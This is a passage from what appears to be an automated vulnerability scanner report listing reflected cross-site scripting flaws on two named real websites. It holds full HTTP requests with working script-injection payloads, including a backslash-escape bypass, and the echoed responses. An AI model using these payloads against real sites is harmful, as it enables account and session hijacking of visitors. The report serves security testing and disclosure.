The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1815c"><script>alert(1)</script>41682778012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /of.asp?1815c"><script>alert(1)</script>41682778012=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 37053
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Gen. Ch
...[SNIP]...
<a href="/of.asp?1815c"><script>alert(1)</script>41682778012=1&amp;fa=nf">
...[SNIP]...

2.52. http://otakubooty.com/otaku_help.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a456"><script>alert(1)</script>d7ef83a91a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_help.asp?3a456"><script>alert(1)</script>d7ef83a91a7=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 851287
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<a href="/otaku_help.asp?3a456"><script>alert(1)</script>d7ef83a91a7=1&amp;fa=nf">
...[SNIP]...

2.53. http://otakubooty.com/otaku_help.asp [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517ef"><script>alert(1)</script>0f370775ea6 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_help.asp?tab=mailpassword517ef"><script>alert(1)</script>0f370775ea6 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.3.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:30:02 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 851753


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<a href="/otaku_help.asp?tab=mailpassword517ef"><script>alert(1)</script>0f370775ea6&amp;fa=nf">
...[SNIP]...

2.54. http://otakubooty.com/otaku_news.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_news.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ea6"><script>alert(1)</script>6181d9322cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_news.asp?d1ea6"><script>alert(1)</script>6181d9322cf=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34038
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/otaku_news.asp?d1ea6"><script>alert(1)</script>6181d9322cf=1&amp;fa=nf">
...[SNIP]...

2.55. http://otakubooty.com/otaku_search.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_search.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24821"><script>alert(1)</script>ceffb1b07c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_search.asp?24821"><script>alert(1)</script>ceffb1b07c0=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 23480
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Find Me
...[SNIP]...
<a href="/otaku_search.asp?24821"><script>alert(1)</script>ceffb1b07c0=1&amp;fa=nf">
...[SNIP]...

2.56. http://otakubooty.com/otaku_signup.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9a5"><script>alert(1)</script>6c4c802194a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_signup.asp?5b9a5"><script>alert(1)</script>6c4c802194a=1 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 19433


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<a href="/otaku_signup.asp?5b9a5"><script>alert(1)</script>6c4c802194a=1&amp;fa=nf">
...[SNIP]...

2.57. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efbdf\"%3balert(1)//5e820bfb5e was submitted in the ref parameter. This input was echoed as efbdf\\";alert(1)//5e820bfb5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\"%3balert(1)//5e820bfb5e HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:40:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:40:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:40:43 GMT
Content-Length: 169473


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
s.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050119","30050119","30050119","428477","72","fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\\";alert(1)//5e820bfb5e","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.58. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f89f\"%3balert(1)//1611fbaf415 was submitted in the trackingpgroup parameter. This input was echoed as 3f89f\\";alert(1)//1611fbaf415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC3f89f\"%3balert(1)//1611fbaf415&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:39:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:39:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:39:42 GMT
Content-Length: 165008


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC3f89f\\";alert(1)//1611fbaf415";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "fgvprtlsmsn_hp021111_unknown
...[SNIP]...

2.59. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66204\"%3balert(1)//2ea94e2c6c0 was submitted in the viewpos parameter. This input was echoed as 66204\\";alert(1)//2ea94e2c6c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=266204\"%3balert(1)//2ea94e2c6c0&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:38:29 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:38:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:38:29 GMT
Content-Length: 166358


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="266204\\";alert(1)//2ea94e2c6c0";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.99";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...

2.60. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 859ae\"%3balert(1)//49c0c02e430 was submitted in the Ref parameter. This input was echoed as 859ae\\";alert(1)//49c0c02e430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef859ae\"%3balert(1)//49c0c02e430&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:57:13 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:57:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:57:13 GMT
Content-Length: 161940


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007357","30007357","30007357","269248","72","HomeNoRef859ae\\";alert(1)//49c0c02e430","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.61. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
